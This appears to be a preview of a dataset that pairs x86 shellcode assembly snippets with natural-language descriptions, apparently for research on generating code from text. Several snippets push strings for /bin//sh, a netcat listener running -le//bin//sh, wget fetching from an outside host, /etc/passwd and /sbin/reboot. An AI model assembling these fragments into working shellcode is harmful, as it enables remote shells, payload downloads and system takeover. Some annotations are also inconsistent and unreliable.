SNIPPETS stringlengths 2 1.64k | INTENTS stringlengths 4 1.66k |
|---|---|
push eax | push nulls for string termination |
push eax | push null byte as string terminator |
push eax | push null into the stack |
push eax | push null on stack |
push eax | move 0 to stack (protocol=0) |
push eax | push 0 (=eax) |
push eax | push ipproto_ip = 0 (eax) on stack |
push eax | push sin6_addr, saved in eax, on stack |
push eax | push null byte on stack |
push eax | push null terminator |
push eax | preserve eax on the stack |
push eax | push eax onto the stack |
push eax | push eax to the stack |
push eax | push eax value to the stack |
push eax | push the contents of eax onto the stack |
push eax | push the contents of eax register onto the stack |
push eax | push the contents of the eax register onto the stack |
push eax | push the value of register eax onto the stack |
push eax \n inc eax | push eax on stack then increment its conent |
push eax \n mov ebx, esp | push the contents of the eax register onto the stack and point ebx to the stack register |
push eax \n mov ecx, esp | push the contents of the eax register onto the stack and point ecx to the stack register |
push eax \n mov edi, 0x343997b7 \n rol edi, 1 \n push edi \n mov esi, 0xd2c45e5e \n ror esi, 1 \n push esi | push null terminating string and Ô/bin/shÕ to the stack |
push eax \n mov edx, esp | clear edx |
push eax \n mov edx, esp | push null in the edx position |
push eax \n mov edx, esp | clear eax register |
push eax \n mov edx, esp | envp = 0 |
push eax \n mov edx, esp | load eax into edx register |
push eax \n mov edx, esp | push the contents of the eax register onto the stack and point edx to the stack register |
push eax \n mov edx, esp \n push eax \n mov ecx, esp | insert null in edx and ecx |
push eax \n mov edx, esp \n push eax \n mov ecx, esp | zero out edx and ecx register |
push eax \n mov edx, esp \n push ebx \n mov ecx, esp \n mov al, 0xb \n int 0x80 | execute __nr_execve syscall |
push eax \n mov edx,esp | push null temrinating string on edx |
push eax \n pop ecx | move eax by inserting it in the stack in ecx extracting it from the stack |
push eax \n pop edi | load 0 into edi register |
push eax \n pop edx | transfer eax contents into edx register |
push eax \n pop edx | load eax content into edx |
push eax \n push 0x30 | push eax and the hexadecimal value 0x30 on the stack |
push eax \n push 0x31373737 \n push 0x3170762d \n mov esi, esp | load chained null and the arg -vp17771 into esi register |
push eax \n push 0x35353535 \n push 0x70746c2d \n mov ecx, esp | push 0, port number = 5555, command -ltp on stack. ecx point to the top pf the stack. |
push eax \n push 0x39393939 \n push 0x39706c2d | push 0-term, 9999, 9pl- on the stack |
push eax \n push 0x4b434148 | push null terminated string ÔhackÕ on stack |
push eax \n push 0x636e2f2f \n push 0x6e69622f \n mov ebx, esp | load chained null and the arg /bin//nc into ebx register |
push eax \n push 0x636e2f6e \n push 0x69622f2f | push 0-term, cn/n, ib// on the stack |
push eax \n push 0x6769666e \n push 0x6f635f64 \n push 0x6873732f \n push 0x6873732f \n push 0x6374652f | push 0-term, gifn, oc_d, hss/, hss/, cte/ on the stack |
push eax \n push 0x68732f2f \n push 0x6e69622f \n mov ebx, esp | load Ô/bin//sh\0Õ intp ebx register |
push eax \n push 0x68732f2f \n push 0x6e69622f \n mov ebx, esp | load Ô/bin//sh\0Õ into ebx register |
push eax \n push 0x68732f2f \n push 0x6e69622f \n push 0x2f656c2d \n mov edi, esp | load chained null and the arg -le//bin//sh into edi register |
push eax \n push 0x68732f2f \n push 0x6e69622f \n push 0x2f656c2d \n mov edx, esp | load chained null and the arg -le//bin//sh into edx register |
push eax \n push 0x68732f2f \n push 0x6e69622f \n push ebx, esp \n mov edx, eax \n mov al, 0xb \n int 0x80 | execute execve syscall putting null temrinated string Ô/bin//shÕ into ebx register, the parameter 0 into edx and the syscall code into al register. |
push eax \n push 0x68732f6e \n push 0x69622f2f \n mov ebx, esp | load the string //bin/sh\0 into ebx regsiter |
push eax \n push 0x68736162 \n push 0x2f6e6962 \n push 0x2f2f652d | push 0-term, hsab, /nib, //e- on the stack |
push eax \n push 0x6c6c6568 \n push 0x2f6d3462 \n push 0x6d33622f \n push 0x2f2f2f6d \n push 0x6f632e73 \n push 0x616d6978 \n push 0x656d2e33 \n mov ecx, esp | save null terminated string Ô3.meximas.com////b3mb4m/hellÕ into ecx register |
push eax \n push 0x7361642f \n push 0x6e69622f \n mov ebx, esp | load null terminate string Ô/bin/dasÕ into ebx regsiter |
push eax \n push 0x7461632f \n push 0x6e69622f | push 0-term, tac/, nib/ on the stack |
push eax \n push 0x74656777 \n push 0x2f6e6962 \n push 0x2f727375 \n push 0x2f2f2f2f \n mov ebx, esp | load null terminated string Ô////usr/bin/wgetÕ intp ebx regsiter |
push eax \n push 0x746f6f62 \n push 0x65722f6e \n push 0x6962732f \n mov ebx, esp | load null temrinated string Ô/sbin/rebootÕ into ebx register |
push eax \n push 0x746f6f62 \n push 0x65722f6e \n push 0x6962732f \n mov ebx, esp | load null terminated string Ôsbin/rebootÕ into ebx register |
push eax \n push byte +0x68 \n mov ebx,esp | load eax content and the byte +0x68 into ebx register |
push eax \n push byte 0x1 \n push byte 0x2 | push the parameters (0, sock_stream =1, af_inet=2) on stack |
push eax \n push byte 0x1 \n push byte 0x2 \n mov ecx, esp | push the protocol 0, the type, sock_stream, and the domain af_inet on the stack and then load the stack pointer into ecx register |
push eax \n push dword 0x39396e2d | put 0-term and the word 99n- on stack |
push eax \n push dword 0x64616568 \n push dword 0x2f6e6962 \n push dword 0x2f2f2f2f \n push dword 0x7273752f | put 0-term and the double words daeh, /nib, ////, rsu/ on the stack |
push eax \n push dword 0x64777373 \n push dword 0x61702f63 \n push dword 0x74652f2f | put 0-term, dwss, ap/c, te// on stack |
push eax \n push eax | push eax content on the stack 2 times |
push eax \n push eax | push null two times on stack |
push eax \n push eax \n push ecx \n push ebx \n mov ecx, esp | load eax two times, ecx and ebx into ecx register |
push eax \n push ebp \n push edi \n \n push esi \n push ebx | push eax, ebp, edi, esi, ebx on the stack |
push eax \n push ebx | push eax and ebx content on stack |
push eax \n push ebx | push ebx and eax on stack |
push eax \n push ebx | push eax and ebx contents on stack |
push eax \n push ebx \n mov ecx, esp | load eax and ebx contents chained into ecx register |
push eax \n push ecx \n push ebx | push eax,ecx and ebx contents on stack |
push eax \n push ecx \n push esi \n mov ecx,esp | push eax, ecx and esi on the stack and then load the stack pointer in ecx register |
push eax \n push edi | push eax and edi contents on the stack |
push eax \n push edi \n push esi \n push ebx | push 0-term, the args in edi, the args in esi and the pointer to /user////bin/head on the stack |
push eax \n push edi \n push esi \n push ebx \n mov ecx, esp | load eax, edi, esi, ebx contents into ecx register |
push eax \n push edi \n push esi \n push ebx \n mov ecx, esp | chain the register eax,edi, esi, ebx and load the contents on ecx register |
push eax \n push edi \n push esi \n push ebx \n mov ecx, esp | concatenate the content of eax, edi, esi, ebx and load them into ecx register |
push eax \n push edx | push eax and edx on the stack |
push eax \n push edx | push eax and edx contents on stack |
push eax \n push edx \n push ecx \n push ebx \n mov edi, esp | load eax, edx, ecx and ebx contents chanined into edi register |
push eax \n push edx \n push esi \n push ebx | push eax, edx, esi, ebx contents on the stack |
push eax \n push esi \n push ebx | push eax, esi and bx contents on the stack |
push eax \n push esi \n push edi \n push ebx | push eax, esi, edi and ebx contents on stack |
push eax \n push esp | push eax and esp register on the stack |
push eax \n push word 0x6873 \n push 0x61622f2f \n push 0x6e69622f \n mov ebx,esp | load the string Ò/bin//bash\0Ó into ebx register |
push eax \n xor eax, eax \n mov al, 1 | push eax register on the satck than clear it and put the number of the syscall exit in its laast byte |
push ebp | save old base pointer |
push ebp | save the old base pointer value |
push ebp | push the contents of the ebp register onto the stack |
push ebp | push the ebp onto the stack |
push ebp | push ebp onto the stack |
push ebx | insert ebx on the stack |
push ebx | push ebx on the stack |
push ebx | push ebx content on the stack |
push ebx | push ebx content i on the stack |
push ebx | push the command to run on stack |
push ebx | push backlog value equals to 2 on stack |
push ebx | push ebx content on stack |
push ebx | push 0 on stack |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.